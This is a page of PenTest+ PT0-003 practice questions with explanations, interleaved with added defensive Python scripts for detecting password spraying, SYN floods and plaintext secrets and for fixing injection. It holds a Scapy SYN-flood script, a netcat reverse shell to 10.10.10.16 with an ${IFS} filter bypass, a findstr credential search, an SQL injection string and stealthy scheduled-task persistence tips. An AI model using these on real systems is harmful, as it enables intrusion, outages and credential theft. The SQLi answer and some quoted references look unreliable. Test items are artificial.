Free CompTIA PT0-003 Practice Questions 2026 - Page 8
A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?
A. Shoulder surfing
B. Recon-ng
C. Social media
D. Password dumps
Explanation:
This question asks what the tester should do first when developing a phishing campaign, given that spear phishing is authorized.
Understanding spear phishing:
Spear phishing is a targeted form of phishing that focuses on specific individuals or departments within an organization. Unlike broad, generic phishing, spear phishing requires reconnaissance to personalize the messages and make them convincing.
The tester needs to gather information about potential targets before crafting the emails.
Analysis of Each Option:
A. Shoulder surfing
This is a physical social engineering technique where the tester observes someone typing passwords or viewing sensitive information. This would occur during an on-site assessment, not as the first step in developing a phishing campaign. It is also not typically authorized in remote engagements. Incorrect.
B. Recon-ng
Recon-ng is a reconnaissance framework that automates OSINT gathering from multiple sources such as search engines, DNS records, and social platforms. It can collect email addresses and employee details useful for spear phishing. While useful, it is a tool used after identifying initial targets. Not the very first step.
C. Social media
Platforms like LinkedIn, Twitter, and Facebook are excellent sources for identifying employees, their job roles, responsibilities, interests, and reporting structure. This information is critical for crafting believable spear phishing messages. Reviewing social media profiles is commonly the first step in targeted reconnaissance. Correct.
D. Password dumps
Searching breached credential databases can help with credential stuffing or validation later. However, this is not typically the first step in building a phishing campaign. It does not help identify or profile targets initially. Incorrect.
Why Social Media Is First:
A typical spear phishing workflow begins with:
Identifying employees and organizational structure
Understanding roles and responsibilities
Gathering contextual information for personalization
Social media provides this foundational intelligence. Automated tools like Recon-ng may be used afterward to scale and expand the data collection.
Conclusion:
The tester should begin by researching social media to identify potential targets and gather information necessary to personalize the spear phishing campaign.
As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?
A. Establishing a reverse shell
B. Executing a process injection attack
C. Creating a scheduled task
D. Performing a credential-dumping attack
Explanation:
Maintaining access after rebooting the compromised system requires a persistence mechanism — something that automatically re-establishes a connection or executes malicious code every time the system starts up or a user logs in.
Creating a scheduled task (using schtasks.exe on Windows or cron/at on Linux) is one of the most reliable, widely used, and stealthy persistence techniques in penetration testing and red teaming.
Why It Is the Best Choice:
Scheduled tasks survive reboots and can be configured to run:
At system startup (/SC ONSTART)
At user logon (/SC ONLOGON)
Daily or weekly schedules
As SYSTEM or the current user
It can launch a reverse shell, download-and-execute payload, run a beacon, or re-establish command-and-control automatically.
It uses a native Windows utility (schtasks.exe), making it a living-off-the-land technique that does not require dropping additional tools.
It can be made stealthy by using legitimate-looking names such as “WindowsUpdateCheck” and running hidden.
This is a classic persistence technique covered in PT0-003 objectives.
Why the Other Options Are Incorrect:
A. Establishing a reverse shell
A reverse shell provides temporary remote access. However, once the system reboots or the process is terminated, the connection is lost. It does not automatically restart after reboot unless combined with a persistence mechanism. Not persistent by itself.
B. Executing a process injection attack
Process injection (such as DLL injection or process hollowing) is used for execution and defense evasion. It allows malicious code to run within another process’s memory but does not survive a reboot unless paired with a persistence mechanism. Not persistence on its own.
D. Performing a credential-dumping attack
Credential dumping extracts password hashes, Kerberos tickets, or plaintext credentials for lateral movement or privilege escalation. It provides access opportunities but does not maintain access after reboot. This is credential access, not persistence.
Key Learning Point:
Scheduled tasks are one of the most common and effective persistence techniques. They are frequently contrasted with non-persistent methods like reverse shells and process injection in certification exams.
Conclusion:
To maintain access after rebooting the system, the best technique among the options is creating a scheduled task.
While conducting a reconnaissance activity, a penetration tester extracts the following information:
Emails:
- admin@acme.com
- sales@acme.com
- support@acme.com
Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?
A. Unauthorized access to the network
B. Exposure of sensitive servers to the internet
C. Likelihood of SQL injection attacks
D. Indication of a data breach in the company
Explanation:
Logical Progression:
Once email addresses (especially administrative ones like admin@acme.com) have been harvested during the reconnaissance phase, the most direct next step is to use them as usernames for authentication-based attacks.
Attack Vectors:
These emails allow the tester to launch Password Spraying, Brute Force, or Credential Stuffing attacks against external-facing portals such as VPNs, Office 365, or webmail. If successful, the tester gains a valid set of credentials, leading directly to unauthorized access to the internal network or cloud environment.
Target Selection:
Administrative accounts are high-value targets because they often possess elevated privileges, making them the primary focus for gaining a foothold.
Why other options are incorrect
❌ B. Exposure of sensitive servers to the internet:
While finding emails is a form of exposure, it does not confirm that servers (like databases or internal file shares) are directly reachable from the internet. Email harvesting is a user-centric finding, not a network infrastructure finding.
❌ C. Likelihood of SQL injection attacks:
SQL injection is a web application vulnerability found by interacting with input fields (like search bars or login forms). Knowing an email address does not increase the technical likelihood that the underlying code is vulnerable to SQLi.
❌ D. Indication of a data breach in the company:
Discovering publicly available email addresses is a standard part of OSINT and does not prove that a data breach has already occurred. Breach indication would require finding leaked passwords or sensitive internal documents.
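The attack the explanation anticipates, a few common passwords tried against every harvested address, has a recognisable shape in authentication logs: one source, many distinct usernames, only one or two attempts per account, mostly failures, inside a short window. The script below is an added, defender-side illustration (not code from the original page) that looks for that shape. The log format and the sample lines are constructed for the example; VPN, webmail and Office 365 portals each log differently, so the parser is the part to adapt.

```python
"""Detect password-spraying patterns in authentication logs.

Added, defender-side illustration; not code from the original page. The log
format "<timestamp> <OK|FAIL> user=<addr> src=<ip>" and the sample lines are
constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2026-01-12T08:00:01 FAIL user=admin@acme.com src=203.0.113.7
2026-01-12T08:00:03 FAIL user=sales@acme.com src=203.0.113.7
2026-01-12T08:00:05 FAIL user=support@acme.com src=203.0.113.7
2026-01-12T08:00:07 FAIL user=hr@acme.com src=203.0.113.7
2026-01-12T08:00:09 FAIL user=it@acme.com src=203.0.113.7
2026-01-12T08:00:11 OK   user=sales@acme.com src=203.0.113.7
2026-01-12T08:01:00 FAIL user=admin@acme.com src=198.51.100.4
2026-01-12T08:01:03 FAIL user=admin@acme.com src=198.51.100.4
2026-01-12T08:01:06 OK   user=admin@acme.com src=198.51.100.4
2026-01-12T09:30:00 OK   user=support@acme.com src=192.0.2.10
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<result>OK|FAIL)\s+user=(?P<user>\S+)\s+src=(?P<src>\S+)$"
)

def parse_log(text):
    """Yield (timestamp, result, user, src) tuples; lines that do not match are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"])

def detect_spray(events, window=timedelta(minutes=10), min_users=4, max_per_user=2):
    """Return {src: sorted targeted users} for sources whose behaviour looks like
    spraying: within `window`, at least `min_users` distinct accounts attempted,
    no account tried more than `max_per_user` times, and every account has at
    least one failure (a source that logs in to many accounts with no failures
    is more likely a shared workstation or a service)."""
    by_src = defaultdict(list)
    for ts, result, user, src in sorted(events):
        by_src[src].append((ts, result, user))

    flagged = {}
    for src, evs in by_src.items():
        # Slide a window over this source's events, oldest first.
        for i, (start, _, _) in enumerate(evs):
            attempts = defaultdict(int)
            failed = set()
            for ts, result, user in evs[i:]:
                if ts - start > window:
                    break
                attempts[user] += 1
                if result == "FAIL":
                    failed.add(user)
            if (len(attempts) >= min_users
                    and max(attempts.values()) <= max_per_user
                    and failed == set(attempts)):
                flagged[src] = sorted(attempts)
                break
    return flagged

if __name__ == "__main__":
    for src, users in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(f"possible password spray from {src}: {len(users)} accounts -> {', '.join(users)}")
```

The second source in the sample (three tries against admin@acme.com, then success) is a classic brute-force shape rather than a spray, and a per-account lockout threshold would catch it; sprays are built precisely to stay under that threshold, which is why the detection has to pivot on the source and the number of distinct accounts instead.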
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:
ip = IP("192.168.50.2")
tcp = TCP(sport=RandShort(), dport=80, flags="S")
raw = RAW(b"X"*1024)
p = ip/tcp/raw
send(p, loop=1, verbose=0)
Which of the following attack types is most likely being used in the test?
A. MDK4
B. Smurf attack
C. FragAttack
D. SYN flood
Explanation:
The provided code is a classic Python/Scapy script used to generate a SYN flood.
Key Indicators in the Script:
flags="S"
This is the critical indicator. The "S" flag stands for SYN (Synchronize). In a normal TCP three-way handshake, the client sends a SYN, the server responds with a SYN-ACK, and the client finishes with an ACK.
sport=RandShort()
RandShort() picks a random 16-bit value for the source port of every packet, so each SYN looks like a separate connection attempt rather than a retransmission of the same one.
loop=1
This makes send() repeat the packet indefinitely instead of sending it once.
By sending a continuous stream of SYN packets without ever sending the final ACK, the attacker forces the target server to keep half-open connections in memory (the SYN backlog). Eventually, this exhausts system resources and prevents legitimate users from connecting.
Incorrect Answers:
A. MDK4
MDK4 (Murder Death Kill 4) is a standalone command-line tool designed for wireless (802.11) attacks such as deauthentication or beacon flooding. It is not a packet-crafting Python script like the one shown. Incorrect.
B. Smurf attack
A Smurf attack is an amplification-based DoS attack using ICMP traffic. It involves sending ICMP Echo Requests with a spoofed source IP address to a broadcast address. The script shown uses TCP packets, not ICMP, so it cannot be a Smurf attack. Incorrect.
C. FragAttack
FragAttacks (Fragmentation and Aggregation Attacks) refer to a set of Wi-Fi (802.11) vulnerabilities discovered in 2021 that exploit frame fragmentation behavior. The provided script performs a Layer 3/4 TCP attack, not a Layer 2 wireless fragmentation exploit. Incorrect.
Conclusion:
The script repeatedly sends TCP SYN packets with random source ports in an infinite loop, which is the definition of a SYN flood denial-of-service attack.
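On the receiving side the same three indicators are what a capture shows: a destination collecting far more SYNs than handshake-completing ACKs, spread over an unusually large number of source ports. The script below is an added, defender-side companion to the question (not code from the original page) that computes that ratio per destination from packet records. The records are constructed for the example and use Scapy's letter notation for TCP flags ("S", "SA", "A", "PA"); a real deployment would read them from a pcap or a flow export.

```python
"""Spot a SYN flood in captured traffic by counting handshakes that never complete.

Added, defender-side illustration; not code from the original page. Packet
records are constructed tuples (src_ip, src_port, dst_ip, dst_port, flags).
"""
from collections import defaultdict

# Constructed sample: one normal handshake plus data, then a burst of bare SYNs
# from a single host using a different source port for every packet.
NORMAL = [
    ("192.168.50.10", 51000, "192.168.50.2", 80, "S"),
    ("192.168.50.2", 80, "192.168.50.10", 51000, "SA"),
    ("192.168.50.10", 51000, "192.168.50.2", 80, "A"),
    ("192.168.50.10", 51000, "192.168.50.2", 80, "PA"),
]
FLOOD = [("192.168.50.9", 1024 + (i * 37) % 60000, "192.168.50.2", 80, "S") for i in range(200)]
SAMPLE_PACKETS = NORMAL + FLOOD

def half_open_stats(packets):
    """Per destination (ip, port): number of SYNs, the (ip, port) of every client
    that sent one, and the subset of those clients that later sent a plain ACK."""
    stats = defaultdict(lambda: {"syn": 0, "clients": set(), "completed": set()})
    for src, sport, dst, dport, flags in packets:
        key = (dst, dport)
        if flags == "S":                                   # bare SYN: attempt
            stats[key]["syn"] += 1
            stats[key]["clients"].add((src, sport))
        elif "A" in flags and "S" not in flags:            # ACK without SYN
            if key in stats and (src, sport) in stats[key]["clients"]:
                stats[key]["completed"].add((src, sport))  # handshake finished
    return stats

def flag_syn_floods(packets, min_syn=100, max_completion=0.2):
    """Return [(dst_ip, dst_port, syn_count, completion_ratio)] for destinations
    that received at least `min_syn` SYNs of which no more than `max_completion`
    (as a fraction) were followed by a handshake-completing ACK."""
    findings = []
    for (dst, dport), s in half_open_stats(packets).items():
        if s["syn"] < min_syn:
            continue
        ratio = len(s["completed"]) / s["syn"]
        if ratio <= max_completion:
            findings.append((dst, dport, s["syn"], round(ratio, 3)))
    return findings

if __name__ == "__main__":
    for dst, dport, syns, ratio in flag_syn_floods(SAMPLE_PACKETS):
        print(f"{dst}:{dport}: {syns} SYNs, completion ratio {ratio}")
```

Because the flood in the question never sends the final ACK, the completion ratio collapses towards zero as the backlog fills; the usual mitigations are SYN cookies on the server (net.ipv4.tcp_syncookies on Linux), a shorter SYN-RECEIVED timeout, and rate limiting of new connections per source at the edge.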
A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?
A. attacker_host$ nmap -sT | nc -n 22
B. attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 80 | tee backpipe
C. attacker_host$ nc -nlp 8000 | nc -n attacker_host$ nmap -sT 127.0.0.1 8000
D. attacker_host$ proxychains nmap -sT
Explanation:
The scenario describes a penetration tester who has compromised a host and now wants to pivot through that host to enumerate other targets. Pivoting requires setting up a relay or proxy so that traffic from the tester’s machine is tunneled through the compromised host.
Analysis of the Options:
A. nmap -sT | nc -n 22
This syntax is invalid and does not properly establish a relay or pivot. It does not create a functional tunnel for enumeration. Incorrect.
B. mknod backpipe p ...
This refers to a named pipe technique sometimes used to relay traffic, but the command shown is malformed and not appropriate for reliable pivoting with Nmap. Incorrect.
C. nc -nlp 8000 | nc -n ... nmap -sT 127.0.0.1 8000
This attempts to chain Netcat listeners together, but it is not a clean or reliable method for pivoting Nmap scans through a compromised host. Incorrect.
D. proxychains nmap -sT
This is the correct answer. Proxychains forces Nmap traffic through a configured proxy (such as a SOCKS proxy running on the compromised host). This allows the tester to route scan traffic through the pivot system to reach internal targets.
Why D Is the Best Choice:
Proxychains integrates with tools such as Nmap, curl, and ssh to route traffic through a compromised system.
It enables enumeration of internal services as if scanning locally, while traffic is relayed through the pivot host.
It is a standard and recognized post-exploitation pivoting technique.
Conclusion:
The correct method for pivoting and enumerating internal systems through a compromised host is using proxychains with Nmap.
During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?
A. On-path
B. Logic bomb
C. Rootkit
D. Buffer overflow
Explanation:
The question describes a host-based attack where the attacker uses software to disguise itself as legitimate software to gain unauthorized access to internal resources on a compromised system within an internal corporate network.
Rootkit — Correct Answer
A rootkit is a type of malicious software designed to hide its presence and provide privileged (often root or administrator-level) access to a system.
It achieves stealth by disguising itself and modifying operating system components such as:
Kernel modules
Processes
Files and directories
Registry entries
Network connections
This makes the malware appear legitimate or invisible to standard monitoring tools, antivirus software, and even administrators.
Common rootkit techniques include:
Hooking system calls
Hiding processes, files, and directories
Altering logs
Masquerading as legitimate drivers or services
Once installed, a rootkit enables persistent, stealthy unauthorized access and control over the host — which directly matches the scenario described.
Why the Other Options Are Incorrect:
A. On-path
An on-path (formerly man-in-the-middle) attack is network-based. It intercepts communications between systems (such as through ARP poisoning or DNS spoofing). It does not disguise malicious software on the host itself. Incorrect.
B. Logic bomb
A logic bomb is malware that triggers when a specific condition is met, such as a certain date or event. It does not focus on stealthy, ongoing access or disguising itself as legitimate software. Incorrect.
D. Buffer overflow
A buffer overflow is an exploitation technique used to execute arbitrary code or gain initial access. It is not a persistence or concealment mechanism. It does not inherently disguise malicious software. Incorrect.
Key Learning Point:
Rootkits are classic host-based persistence and defense evasion tools. They are specifically designed to mask malicious activity and maintain stealthy access on compromised systems.
Conclusion:
To disguise malicious software as legitimate and maintain unauthorized access to internal resources on a host, the correct answer is a rootkit.
A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?
A. A generative AI assistant
B. The customer's designated contact
C. A cybersecurity industry peer
D. A team member
Explanation:
Before sharing a penetration test report, the tester should request a review from the customer’s designated contact. This person is authorized to receive sensitive findings and validate that the report aligns with the agreed scope, expectations, and communication protocols. It ensures confidentiality, proper handling of vulnerabilities, and avoids premature or unauthorized disclosure.
According to NIST SP 800-115, “All findings should be communicated through the designated point of contact to ensure proper coordination and response” (Section 5.5). The OWASP Testing Guide v4 also emphasizes that “the report should be reviewed and validated with the client before final delivery to ensure accuracy and relevance.”
This step is critical for:
Confirming technical accuracy and business impact
Ensuring findings are not misinterpreted or miscommunicated
Respecting contractual and legal boundaries
❌ A. A generative AI assistant
AI tools are not suitable for reviewing sensitive client data due to privacy, confidentiality, and data handling risks. They are not authorized parties and may inadvertently expose or misuse proprietary information.
Reference:
OWASP Top 10 Privacy Risks – “Unintended data exposure through third-party tools and services.”
❌ C. A cybersecurity industry peer
External peers are not part of the engagement and lack authorization to view client-specific findings. Sharing the report with them may violate non-disclosure agreements (NDAs) and breach client trust.
Reference:
NIST SP 800-115 – “All communications must be coordinated through the client’s designated contact to avoid unauthorized disclosure.”
❌ D. A team member
Internal peer review is useful during report drafting, but final review must be done by the client’s designated contact. Only the client can validate whether the findings are accurate, relevant, and appropriately scoped.
Reference:
OWASP Testing Guide – “The client should validate the report before it is finalized and distributed.”
Summary:
The penetration tester must prioritize client confidentiality and coordination. The designated contact ensures findings are reviewed securely, accurately, and in line with contractual obligations. This protects both the tester and the client from miscommunication, legal exposure, and operational risk.
References:
NIST SP 800-115 – Technical Guide to Information Security Testing and Assessment
OWASP Web Security Testing Guide – Reporting
OWASP Privacy Risks
During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:
findstr /SIM /C:"pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
A. Configuration files
B. Permissions
C. Virtual hosts
D. Secrets
Explanation:
The command findstr /SIM /C:"pass" *.txt *.cfg *.xml is a powerful search command used on Windows systems. Let's break down the syntax:
findstr: The Windows command-line utility for searching for text patterns in files (similar to grep on Linux).
/S: Search in the current directory and all subdirectories.
/I: Perform a case-insensitive search.
/M: Print only the filename if the file contains a match.
/C:"pass": Search for the literal string "pass".
*.txt *.cfg *.xml: The file extensions to search through (text files, configuration files, and XML files).
The goal is to find any file with a .txt, .cfg, or .xml extension that contains the string "pass". The string "pass" is a very common substring in words related to authentication and sensitive data, such as:
password
passwd
passphrase
userpass
encryptionpass
By running this command from a low-privilege shell, the penetration tester is attempting to discover secrets—like plaintext passwords, password hashes, or other authentication tokens—that may have been inadvertently stored in these common file types by applications or users.
Analysis of Incorrect Options
A. Configuration files:
While this is partially correct because the command is searching through configuration files (.cfg, .xml, and even .txt files often contain configuration data), this is too narrow. The objective isn't just to find configuration files; it's to search within those files (and text/XML files) for a specific type of sensitive data: secrets. The search term "pass" reveals the true intent, which goes beyond just enumerating configuration files.
B. Permissions:
The findstr command is searching file contents for a specific string. It is not interacting with or displaying file system permissions (e.g., ACLs, read/write attributes). A command like icacls or cacls would be used for enumerating permissions.
C. Virtual hosts:
Virtual hosts are typically configured in web server configuration files (like httpd.conf on Apache or within site bindings in IIS). While an XML or config file might contain virtual host settings, the specific search string "pass" is not indicative of searching for virtual host configurations. The tester would more likely be searching for strings like "VirtualHost" or "ServerName".
Reference
This technique falls under CompTIA PenTest+ (PT0-003) Domain 3.0: Attacks and Exploits, specifically related to:
Privilege Escalation: A common step after gaining initial access is to search the file system for credentials (secrets) that can be used to elevate privileges or move laterally across the network.
Data Mining: Searching for sensitive, cleartext data stored insecurely on a system.
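The findstr one-liner is exactly what a low-privilege intruder runs, so the same search is worth running from the other side as a hygiene check before an assessment finds it. The script below is an added, defender-side companion to the question (not code from the original page): it walks a directory tree, reads only text-like files, reports any line that looks like a credential assignment (key=value, key: value, or <Password>value</Password>), and redacts the matched value so the report itself is not a new leak. The sample files are constructed in a temporary directory by build_sample_tree().

```python
"""Audit a directory tree for plaintext credentials in text and config files.

Added, defender-side illustration; not code from the original page. The
sample tree is constructed in a temporary directory.
"""
import os
import re
import tempfile

TEXT_LIKE = {".txt", ".cfg", ".xml", ".ini", ".conf", ".env"}

# key=value, key: value and <Password>value</Password> forms; the key list is the
# same family of words the findstr search is after (pass, password, passwd, ...)
SECRET_RE = re.compile(
    r"""(?ix)
    (?P<key>pass(?:word|wd|phrase)?|pwd|secret|api[_-]?key|token)
    \s*(?:=|:|>)\s*
    ["']?(?P<value>[^"'<\s;]{4,})
    """
)

def redact(value):
    """Keep the first two characters so a finding is recognisable but unusable."""
    return value[:2] + "*" * max(len(value) - 2, 0)

def scan_file(path):
    """Return [(line_no, key, redacted_value)] for credential-looking lines."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            m = SECRET_RE.search(line)
            if m:
                hits.append((no, m["key"].lower(), redact(m["value"])))
    return hits

def scan_tree(root):
    """Walk `root`; return {relative_path (forward slashes): hits} for files with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in TEXT_LIKE:
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report

def build_sample_tree():
    """Constructed fixture: a few files, some clean, some leaking; returns its root."""
    root = tempfile.mkdtemp(prefix="secrets-audit-")
    os.makedirs(os.path.join(root, "app", "conf"))
    samples = {
        "app/conf/db.cfg": "host=db01\nuser=appsvc\npassword=Winter2026!\n",
        "app/conf/web.xml": "<config>\n  <Password>s3cr3tValue</Password>\n</config>\n",
        "notes.txt": "Passport office opens at 9.\nRotate the API_KEY: AKIAEXAMPLEKEY00\n",
        "readme.txt": "This file mentions the word passage but holds no secret.\n",
        "binary.bin": "password=shouldNotBeScanned\n",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, *rel.split("/")), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(build_sample_tree()).items()):
        for no, key, value in hits:
            print(f"{path}:{no}: {key} = {value}")
```

Unlike a bare substring search for "pass", the pattern requires an assignment-like shape, so "Passport" and "passage" do not produce findings; the price is that a credential written in some other layout is missed, which is the usual trade-off between noise and recall in secret scanning.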
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
A. ${IFS}
B. %0a
C. + *
D. %20
Explanation:
The goal is to bypass a filter that is blocking the space character in a command injection attack. The space is crucial for separating the command (nc), its flags (-e), and its arguments (/bin/sh, 10.10.10.16, 4444).
${IFS} is a special shell variable in Linux and other Unix-like systems. IFS stands for Internal Field Separator. By default, this variable contains whitespace characters—including the space, tab, and newline—which the shell uses to split words.
When the shell interpreter encounters ${IFS}, it replaces it with a space (or other whitespace). This allows an attacker to use ${IFS} as a direct substitute for the space character that is being filtered. The command would be rewritten as:
nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444
From the shell's perspective after variable expansion, this is identical to the original command: nc -e /bin/sh 10.10.10.16 4444.
Analysis of Incorrect Options
B. %0a:
This is a URL-encoded representation of a newline character (\n). While a newline can sometimes be used to terminate one command and start another in certain injection contexts (like in HTTP headers or web scripts), it is not a direct substitute for a space character. It would not correctly separate the arguments within the same nc command and would likely cause a syntax error.
C. + *:
These characters are not standard substitutes for a space in shell command syntax.
+ is an operator, not a word separator.
* is a wildcard for globbing (filename expansion). Using it in place of a space would lead to the shell expanding it to filenames in the current directory, which would break the command.
D. %20:
This is the URL-encoded representation of a space character. If the application is filtering the literal space character, it is highly likely also decoding URL-encoded input before applying the filter. Therefore, submitting %20 would simply be decoded back into a space, which would then be caught by the same blocklist. It does not effectively bypass a filter that is aware of basic encoding.
Reference
This question falls under CompTIA PenTest+ (PT0-003) Domain 3.0: Attacks and Exploits, specifically objective 3.2 Given a scenario, exploit network-based vulnerabilities and 3.3 Given a scenario, exploit application-based vulnerabilities.
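The lesson for the application owner is that a blocklist of characters is the wrong layer for this control: the shell, not the filter, decides where words begin and end. The script below is an added, defender-side illustration (not code from the original page). naive_filter_allows() models the space-rejecting filter from the question and lets the ${IFS} payload through; words_after_expansion() models what the shell sees after expanding ${IFS} to its POSIX default of space, tab and newline; validate_host() and build_safe_argv() show the fix, a strict allowlist plus an argument vector that never passes through a shell. The ping-style host check is a constructed stand-in for whatever the vulnerable application did with its input.

```python
"""Why a space-character blocklist fails, and what closes the hole.

Added, defender-side illustration; not code from the original page. The
host-check command is a constructed stand-in for the vulnerable feature.
"""
import re
import subprocess

BLOCKED_CHARS = {" "}

def naive_filter_allows(user_input):
    """Model of the blocklist from the question: True if no blocked character is present."""
    return not any(ch in user_input for ch in BLOCKED_CHARS)

# The payload from the question, with ${IFS} standing in for every space
IFS_PAYLOAD = "nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444"
DEFAULT_IFS = " \t\n"   # POSIX default value of IFS

def words_after_expansion(command):
    """Model of the shell's view: expand ${IFS} to its default, then split on IFS."""
    expanded = command.replace("${IFS}", DEFAULT_IFS)
    return [w for w in re.split("[" + re.escape(DEFAULT_IFS) + "]+", expanded) if w]

# Allowlist: DNS labels or an IPv4 literal, nothing else. A leading '-' is
# rejected too, so the input can never be read as an option by the program.
HOST_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)

def is_valid_host(user_input):
    return len(user_input) <= 253 and HOST_RE.match(user_input) is not None

def validate_host(user_input):
    """Allowlist validation: return the input unchanged or raise ValueError."""
    if not is_valid_host(user_input):
        raise ValueError("invalid host")
    return user_input

def build_safe_argv(user_input):
    """Argument vector for the constructed host check; no shell ever parses it."""
    return ["ping", "-c", "1", validate_host(user_input)]

def run_host_check(user_input, timeout=5):
    """Run the check with shell=False: the input is one argv element, never a command line."""
    result = subprocess.run(build_safe_argv(user_input), capture_output=True, text=True, timeout=timeout)
    return result.returncode == 0

if __name__ == "__main__":
    print("filter blocks literal spaces :", not naive_filter_allows("nc -e /bin/sh 10.10.10.16 4444"))
    print("filter lets ${IFS} through   :", naive_filter_allows(IFS_PAYLOAD))
    print("shell sees                   :", words_after_expansion(IFS_PAYLOAD))
    print("allowlist accepts payload    :", is_valid_host(IFS_PAYLOAD))
```

Even with the allowlist, keeping shell=False matters: with an argument vector the program receives the validated string as a single argument, so there is no later parsing step at which a separator, encoded or otherwise, could be reinterpreted.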
As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?
A. Logic bomb
B. SQL injection
C. Brute-force attack
D. Cross-site scripting
Explanation:
During a penetration test, if an internal application accepts unexpected user input that results in the execution of arbitrary commands, the most likely issue is SQL Injection (SQLi). SQL injection occurs when an attacker or tester manipulates input fields so that the backend interprets the input as part of a SQL query. This vulnerability allows direct interaction with the database, enabling the execution of unintended commands and access to sensitive data.
For example, if the application builds a query dynamically:
"SELECT * FROM users WHERE username = '" + userInput + "';"
An attacker could enter:
' OR '1'='1
turning the query into:
SELECT * FROM users WHERE username = '' OR '1'='1';
This always returns true, granting unauthorized access to all records. Through this method, a tester could extract sensitive data, bypass authentication, and even modify or delete records. More advanced attacks might include Union-based SQLi (to merge queries), Boolean-based blind SQLi, or Time-based blind SQLi to infer data when direct output is restricted.
SQL injection vulnerabilities arise from improper input validation, lack of parameterized queries, or insufficient output encoding. These issues are common in applications that concatenate user input directly into SQL commands. Since the scenario specifically mentions arbitrary command execution via input fields, SQL injection is the most logical exploitation technique to access sensitive data.
Mitigation involves implementing prepared statements, stored procedures, input sanitization, and principle of least privilege for database accounts.
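The concatenated query from the explanation next to its parameterized replacement, as an added illustration that is not code from the original page. Both functions run the same lookup against a throw-away in-memory SQLite table; the first builds the statement by string concatenation exactly as described above, the second passes the value as a bound parameter so the database engine never parses user input as SQL. The table contents are constructed for the example.

```python
"""Concatenated versus parameterized lookup, run against an in-memory SQLite table.

Added illustration; not code from the original page. The users table is a
constructed fixture.
"""
import sqlite3

def make_db():
    """Constructed fixture: three users in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn

def lookup_vulnerable(conn, user_input):
    """Query built by concatenation: the input becomes part of the SQL text."""
    query = "SELECT username, role FROM users WHERE username = '" + user_input + "'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, user_input):
    """Same query with a placeholder: the input is bound as data, never parsed as SQL."""
    query = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(query, (user_input,)).fetchall()

INJECTION = "' OR '1'='1"   # the payload quoted in the explanation

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, normal input  :", lookup_vulnerable(conn, "bob"))
    print("vulnerable, injection     :", lookup_vulnerable(conn, INJECTION))
    print("parameterized, injection  :", lookup_parameterized(conn, INJECTION))
```

With the injection payload the concatenated version returns every row, while the parameterized version returns nothing because it looks for a user whose name is literally the payload string. Parameterization is the control that removes the vulnerability; least privilege for the database account limits what a remaining flaw could reach.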
Why the Other Options Are Incorrect
A. Logic Bomb:
A logic bomb is malicious code that activates when certain conditions are met (e.g., a specific date or event). It’s typically planted by insiders or threat actors to cause harm later. Penetration testers do not deploy destructive payloads, and this technique does not relate to exploiting unexpected input or retrieving data from a database.
C. Brute-Force Attack:
A brute-force attack involves guessing passwords or encryption keys repeatedly until the correct one is found. It targets authentication systems, not vulnerabilities in how input is handled by applications. It does not involve executing arbitrary commands or querying data from a database.
D. Cross-Site Scripting (XSS):
XSS exploits client-side input validation flaws, allowing attackers to inject malicious scripts (usually JavaScript) into web pages viewed by other users. It targets the browser, not the server-side database, and therefore cannot execute backend commands or extract sensitive data stored on the server.
References
CompTIA PenTest+ (PT0-003) Exam Objectives, Domain 3.0 – Attacks and Exploits
OWASP Top 10 (2021) – A03:2021: Injection (https://owasp.org/Top10/A03_2021-Injection/)
NIST SP 800-115, Technical Guide to Information Security Testing and Assessment, Section 5.3.4 – Application Testing
MITRE ATT&CK Framework, Technique T1190 – Exploit Public-Facing Application
CIS Controls v8, Control 16 – Application Software Security
✅ Summary:
